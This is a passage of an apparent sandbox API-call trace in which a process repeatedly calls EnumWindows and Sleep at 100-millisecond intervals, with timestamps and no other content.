(lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.228] Sleep (dwMilliseconds=0x64) [0136.230] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.230] Sleep (dwMilliseconds=0x64) [0136.232] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.232] Sleep (dwMilliseconds=0x64) [0136.233] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.233] Sleep (dwMilliseconds=0x64) [0136.235] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.235] Sleep (dwMilliseconds=0x64) [0136.237] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.237] Sleep (dwMilliseconds=0x64) [0136.239] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.239] Sleep (dwMilliseconds=0x64) [0136.240] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.241] Sleep (dwMilliseconds=0x64) [0136.242] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.242] Sleep (dwMilliseconds=0x64) [0136.244] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.244] Sleep (dwMilliseconds=0x64) [0136.246] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.246] Sleep (dwMilliseconds=0x64) [0136.247] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.247] Sleep (dwMilliseconds=0x64) [0136.249] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.249] Sleep (dwMilliseconds=0x64) [0136.250] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.250] Sleep (dwMilliseconds=0x64) [0136.254] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.254] Sleep (dwMilliseconds=0x64) [0136.256] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.256] Sleep (dwMilliseconds=0x64) [0136.257] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.257] Sleep (dwMilliseconds=0x64) [0136.259] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.259] Sleep (dwMilliseconds=0x64) [0136.261] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.261] Sleep (dwMilliseconds=0x64) [0136.263] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.263] Sleep (dwMilliseconds=0x64) [0136.264] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.264] Sleep (dwMilliseconds=0x64) [0136.266] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.266] Sleep (dwMilliseconds=0x64) [0136.267] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.267] Sleep (dwMilliseconds=0x64) [0136.269] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.269] Sleep (dwMilliseconds=0x64) [0136.270] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.270] Sleep (dwMilliseconds=0x64) [0136.272] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.272] Sleep (dwMilliseconds=0x64) [0136.273] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.273] Sleep (dwMilliseconds=0x64) [0136.275] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.275] Sleep (dwMilliseconds=0x64) [0136.277] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.277] Sleep (dwMilliseconds=0x64) [0136.281] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.281] Sleep (dwMilliseconds=0x64) [0136.283] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.283] Sleep (dwMilliseconds=0x64) [0136.285] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.285] Sleep (dwMilliseconds=0x64) [0136.286] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.286] Sleep (dwMilliseconds=0x64) [0136.288] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.288] Sleep (dwMilliseconds=0x64) [0136.290] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.290] Sleep (dwMilliseconds=0x64) [0136.292] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.292] Sleep (dwMilliseconds=0x64) [0136.294] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.294] Sleep (dwMilliseconds=0x64) [0136.296] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.296] Sleep (dwMilliseconds=0x64) [0136.298] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.298] Sleep (dwMilliseconds=0x64) [0136.300] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.300] Sleep (dwMilliseconds=0x64) [0136.302] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.302] Sleep (dwMilliseconds=0x64) [0136.303] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.304] Sleep (dwMilliseconds=0x64) [0136.305] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.305] Sleep (dwMilliseconds=0x64) [0136.310] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.310] Sleep (dwMilliseconds=0x64) [0136.311] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.312] Sleep (dwMilliseconds=0x64) [0136.313] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.313] Sleep (dwMilliseconds=0x64) [0136.315] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.315] Sleep (dwMilliseconds=0x64) [0136.316] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.316] Sleep (dwMilliseconds=0x64) [0136.318] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.318] Sleep (dwMilliseconds=0x64) [0136.320] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.320] Sleep (dwMilliseconds=0x64) [0136.321] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.321] Sleep (dwMilliseconds=0x64) [0136.323] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.323] Sleep (dwMilliseconds=0x64) [0136.324] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.324] Sleep (dwMilliseconds=0x64) [0136.326] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.326] Sleep (dwMilliseconds=0x64) [0136.327] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.327] Sleep (dwMilliseconds=0x64) [0136.329] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.329] Sleep (dwMilliseconds=0x64) [0136.331] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.331] Sleep (dwMilliseconds=0x64) [0136.332] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.332] Sleep (dwMilliseconds=0x64) [0136.340] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.340] Sleep (dwMilliseconds=0x64) [0136.342] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.342] Sleep (dwMilliseconds=0x64) [0136.344] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.344] Sleep (dwMilliseconds=0x64) [0136.350] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.350] Sleep (dwMilliseconds=0x64) [0136.351] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.351] Sleep (dwMilliseconds=0x64) [0136.353] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.353] Sleep (dwMilliseconds=0x64) [0136.354] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.355] Sleep (dwMilliseconds=0x64) [0136.356] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.356] Sleep (dwMilliseconds=0x64) [0136.358] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.358] Sleep (dwMilliseconds=0x64) [0136.360] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.360] Sleep (dwMilliseconds=0x64) [0136.362] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.362] Sleep (dwMilliseconds=0x64) [0136.363] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.363] Sleep (dwMilliseconds=0x64) [0136.365] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.365] Sleep (dwMilliseconds=0x64) [0136.370] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.371] Sleep (dwMilliseconds=0x64) [0136.373] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.374] Sleep (dwMilliseconds=0x64) [0136.375] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.375] Sleep (dwMilliseconds=0x64) [0136.376] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.377] Sleep (dwMilliseconds=0x64) [0136.378] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.378] Sleep (dwMilliseconds=0x64) [0136.380] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.380] Sleep (dwMilliseconds=0x64) [0136.381] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.382] Sleep (dwMilliseconds=0x64) [0136.383] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.384] Sleep (dwMilliseconds=0x64) [0136.385] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.385] Sleep (dwMilliseconds=0x64) [0136.386] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.387] Sleep (dwMilliseconds=0x64) [0136.388] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.388] Sleep (dwMilliseconds=0x64) [0136.389] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.390] Sleep (dwMilliseconds=0x64) [0136.391] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.391] Sleep (dwMilliseconds=0x64) [0136.392] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.394] Sleep (dwMilliseconds=0x64) [0136.395] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.395] Sleep (dwMilliseconds=0x64) [0136.400] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.401] Sleep (dwMilliseconds=0x64) [0136.402] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.402] Sleep (dwMilliseconds=0x64) [0136.403] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.404] Sleep (dwMilliseconds=0x64) [0136.406] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.406] Sleep (dwMilliseconds=0x64) [0136.407] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.408] Sleep (dwMilliseconds=0x64) [0136.409] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.409] Sleep (dwMilliseconds=0x64) [0136.410] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.411] Sleep (dwMilliseconds=0x64) [0136.412] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.412] Sleep (dwMilliseconds=0x64) [0136.413] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.414] Sleep (dwMilliseconds=0x64) [0136.416] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.417] Sleep (dwMilliseconds=0x64) [0136.420] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.420] Sleep (dwMilliseconds=0x64) [0136.422] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.422] Sleep (dwMilliseconds=0x64) [0136.423] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.424] Sleep (dwMilliseconds=0x64) [0136.425] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.425] Sleep (dwMilliseconds=0x64) [0136.426] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.427] Sleep (dwMilliseconds=0x64) [0136.428] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.431] Sleep (dwMilliseconds=0x64) [0136.432] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.433] Sleep (dwMilliseconds=0x64) [0136.434] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.434] Sleep (dwMilliseconds=0x64) [0136.435] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.436] Sleep (dwMilliseconds=0x64) [0136.437] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.437] Sleep (dwMilliseconds=0x64) [0136.438] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.439] Sleep (dwMilliseconds=0x64) [0136.440] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.440] Sleep (dwMilliseconds=0x64) [0136.442] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.442] Sleep (dwMilliseconds=0x64) [0136.443] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.443] Sleep (dwMilliseconds=0x64) [0136.444] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.445] Sleep (dwMilliseconds=0x64) [0136.446] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.446] Sleep (dwMilliseconds=0x64) [0136.447] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.448] Sleep (dwMilliseconds=0x64) [0136.449] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.449] Sleep (dwMilliseconds=0x64) [0136.451] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.451] Sleep (dwMilliseconds=0x64) [0136.455] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.456] Sleep (dwMilliseconds=0x64) [0136.459] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.459] Sleep (dwMilliseconds=0x64) [0136.460] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.461] Sleep (dwMilliseconds=0x64) [0136.466] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.466] Sleep (dwMilliseconds=0x64) [0136.468] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.468] Sleep (dwMilliseconds=0x64) [0136.470] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.470] Sleep (dwMilliseconds=0x64) [0136.471] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.472] Sleep (dwMilliseconds=0x64) [0136.473] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.473] Sleep (dwMilliseconds=0x64) [0136.475] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.475] Sleep (dwMilliseconds=0x64) [0136.476] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.477] Sleep (dwMilliseconds=0x64) [0136.478] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.479] Sleep (dwMilliseconds=0x64) [0136.480] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.480] Sleep (dwMilliseconds=0x64) [0136.482] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.483] Sleep (dwMilliseconds=0x64) [0136.484] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.484] Sleep (dwMilliseconds=0x64) [0136.486] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.486] Sleep (dwMilliseconds=0x64) [0136.488] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.488] Sleep (dwMilliseconds=0x64) [0136.490] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.490] Sleep (dwMilliseconds=0x64) [0136.492] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.492] Sleep (dwMilliseconds=0x64) [0136.493] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.494] Sleep (dwMilliseconds=0x64) [0136.500] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.501] Sleep (dwMilliseconds=0x64) [0136.502] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.502] Sleep (dwMilliseconds=0x64) [0136.503] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.504] Sleep (dwMilliseconds=0x64) [0136.505] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.505] Sleep (dwMilliseconds=0x64) [0136.507] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.507] Sleep (dwMilliseconds=0x64) [0136.508] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.509] Sleep (dwMilliseconds=0x64) [0136.510] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.510] Sleep (dwMilliseconds=0x64) [0136.511] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.512] Sleep (dwMilliseconds=0x64) [0136.513] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.513] Sleep (dwMilliseconds=0x64) [0136.515] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.515] Sleep (dwMilliseconds=0x64) [0136.524] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.525] Sleep (dwMilliseconds=0x64) [0136.527] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.527] Sleep (dwMilliseconds=0x64) [0136.528] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.529] Sleep (dwMilliseconds=0x64) [0136.532] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.532] Sleep (dwMilliseconds=0x64) [0136.533] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.534] Sleep (dwMilliseconds=0x64) [0136.535] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.535] Sleep (dwMilliseconds=0x64) [0136.537] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.537] Sleep (dwMilliseconds=0x64) [0136.539] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.539] Sleep (dwMilliseconds=0x64) [0136.540] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.541] Sleep (dwMilliseconds=0x64) [0136.542] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.543] Sleep (dwMilliseconds=0x64) [0136.544] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.544] Sleep (dwMilliseconds=0x64) [0136.546] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.546] Sleep (dwMilliseconds=0x64) [0136.547] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.548] Sleep (dwMilliseconds=0x64) [0136.549] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.550] Sleep (dwMilliseconds=0x64) [0136.551] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.551] Sleep (dwMilliseconds=0x64) [0136.553] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.553] Sleep (dwMilliseconds=0x64) [0136.555] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.555] Sleep (dwMilliseconds=0x64) [0136.557] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.557] Sleep (dwMilliseconds=0x64) [0136.559] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.559] Sleep (dwMilliseconds=0x64) [0136.561] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.561] Sleep (dwMilliseconds=0x64) [0136.563] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.563] Sleep (dwMilliseconds=0x64) [0136.565] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.565] Sleep (dwMilliseconds=0x64) [0136.571] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.571] Sleep (dwMilliseconds=0x64) [0136.573] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.573] Sleep (dwMilliseconds=0x64) [0136.574] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.575] Sleep (dwMilliseconds=0x64) [0136.576] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.576] Sleep (dwMilliseconds=0x64) [0136.578] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.578] Sleep (dwMilliseconds=0x64) [0136.579] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.579] Sleep (dwMilliseconds=0x64) [0136.581] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.581] Sleep (dwMilliseconds=0x64) [0136.583] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.583] Sleep (dwMilliseconds=0x64) [0136.585] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.585] Sleep (dwMilliseconds=0x64) [0136.586] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.587] Sleep (dwMilliseconds=0x64) [0136.597] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.597] Sleep (dwMilliseconds=0x64) [0136.599] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.599] Sleep (dwMilliseconds=0x64) [0136.601] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.601] Sleep (dwMilliseconds=0x64) [0136.603] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.608] Sleep (dwMilliseconds=0x64) [0136.609] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.609] Sleep (dwMilliseconds=0x64) [0136.610] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.611] Sleep (dwMilliseconds=0x64) [0136.612] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.613] Sleep (dwMilliseconds=0x64) [0136.614] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.614] Sleep (dwMilliseconds=0x64) [0136.615] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.616] Sleep (dwMilliseconds=0x64) [0136.617] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.618] Sleep (dwMilliseconds=0x64) [0136.619] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.619] Sleep (dwMilliseconds=0x64) [0136.620] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.621] Sleep (dwMilliseconds=0x64) [0136.622] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.622] Sleep (dwMilliseconds=0x64) [0136.623] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.624] Sleep (dwMilliseconds=0x64) [0136.625] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.625] Sleep (dwMilliseconds=0x64) [0136.626] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.627] Sleep (dwMilliseconds=0x64) [0136.628] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.628] Sleep (dwMilliseconds=0x64) [0136.629] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.630] Sleep (dwMilliseconds=0x64) [0136.631] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.631] Sleep (dwMilliseconds=0x64) [0136.663] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.663] Sleep (dwMilliseconds=0x64) [0136.664] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.665] Sleep (dwMilliseconds=0x64) [0136.666] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.666] Sleep (dwMilliseconds=0x64) [0136.667] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.668] Sleep (dwMilliseconds=0x64) [0136.669] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.669] Sleep (dwMilliseconds=0x64) [0136.670] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.671] Sleep (dwMilliseconds=0x64) [0136.672] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.672] Sleep (dwMilliseconds=0x64) [0136.673] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.674] Sleep (dwMilliseconds=0x64) [0136.675] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.675] Sleep (dwMilliseconds=0x64) [0136.676] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.677] Sleep (dwMilliseconds=0x64) [0136.678] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.678] Sleep (dwMilliseconds=0x64) [0136.679] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.680] Sleep (dwMilliseconds=0x64) [0136.683] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.684] Sleep (dwMilliseconds=0x64) [0136.688] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.688] Sleep (dwMilliseconds=0x64) [0136.701] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.701] Sleep (dwMilliseconds=0x64) [0136.702] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.703] Sleep (dwMilliseconds=0x64) [0136.704] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.704] Sleep (dwMilliseconds=0x64) [0136.705] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.706] Sleep (dwMilliseconds=0x64) [0136.707] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.709] Sleep (dwMilliseconds=0x64) [0136.710] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.711] Sleep (dwMilliseconds=0x64) [0136.712] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.712] Sleep (dwMilliseconds=0x64) [0136.713] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.714] Sleep (dwMilliseconds=0x64) [0136.726] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.726] Sleep (dwMilliseconds=0x64) [0136.728] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.728] Sleep (dwMilliseconds=0x64) [0136.729] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.731] Sleep (dwMilliseconds=0x64) [0136.733] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.733] Sleep (dwMilliseconds=0x64) [0136.734] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.735] Sleep (dwMilliseconds=0x64) [0136.737] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.737] Sleep (dwMilliseconds=0x64) [0136.765] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.765] Sleep (dwMilliseconds=0x64) [0136.772] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.772] Sleep (dwMilliseconds=0x64) [0136.774] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.774] Sleep (dwMilliseconds=0x64) [0136.775] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.776] Sleep (dwMilliseconds=0x64) [0136.777] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.777] Sleep (dwMilliseconds=0x64) [0136.778] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.779] Sleep (dwMilliseconds=0x64) [0136.780] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.780] Sleep (dwMilliseconds=0x64) [0136.781] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.782] Sleep (dwMilliseconds=0x64) [0136.783] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.783] Sleep (dwMilliseconds=0x64) [0136.785] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.785] Sleep (dwMilliseconds=0x64) [0136.786] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.787] Sleep (dwMilliseconds=0x64) [0136.788] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.788] Sleep (dwMilliseconds=0x64) [0136.790] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.790] Sleep (dwMilliseconds=0x64) [0136.791] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.791] Sleep (dwMilliseconds=0x64) [0136.793] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.793] Sleep (dwMilliseconds=0x64) [0136.794] EnumWindows 